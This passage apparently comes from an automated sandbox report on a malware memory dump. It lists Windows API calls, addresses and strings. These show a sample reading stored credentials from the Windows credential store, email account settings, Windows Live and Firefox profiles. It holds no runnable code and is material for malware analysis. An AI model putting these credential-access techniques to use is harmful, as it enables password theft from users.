                                                                                                                                                                                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                  • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                  • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                  • String ID: J$Microsoft_WinInet
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                  • API String ID: 2881943006-572158859
                                                                                                                                                                                  • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                  • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                  • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                                                  • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                    • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                  • API String ID: 888011440-2039793938
                                                                                                                                                                                  • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                  • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                  • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                  • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                  • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                  • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                  • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                                                                                  • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                  • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                  • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                  • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                                                                                  • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                                                                                                                                                  • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                  • String ID: 0wE$d
                                                                                                                                                                                  • API String ID: 2915808112-1552800882
                                                                                                                                                                                  • Opcode ID: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                  • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                  • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                  • API String ID: 1348940319-1729847305
                                                                                                                                                                                  • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                  • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                  • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                  • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                  • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                                                                                                  • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                  • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                  • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                  • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                                                    • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                                                    • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2432066023-0
                                                                                                                                                                                  • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                  • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                  • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                  • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                  • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                  • API String ID: 945165440-3589380929
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                  • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                  • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                  • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                                                                                  • API String ID: 3411445237-4169760276
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                  • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                    • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                    • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                    • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                  • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Item$DialogMessageSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2485852401-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3642520215-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2313361498-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2126104762-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,004012E4,?), ref: 0040730D
                                                                                                                                                                                  • GetDeviceCaps.GDI32(004012E4,0000000A,?,?,?,?,?,?,004012E4,?), ref: 00407316
                                                                                                                                                                                  • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                  • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1999381814-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                  • API String ID: 1297977491-3883738016
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                    • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                    • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                    • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                    • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID: gj
                                                                                                                                                                                  • API String ID: 438689982-4203073231
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                  • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                                                  • API String ID: 643879872-978417875
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                  • String ID: user_pref("
                                                                                                                                                                                  • API String ID: 765841271-2487180061
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                  • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                  • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                  • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                  • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4281309102-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                  • API String ID: 1631269929-4153097237
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                                                                                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
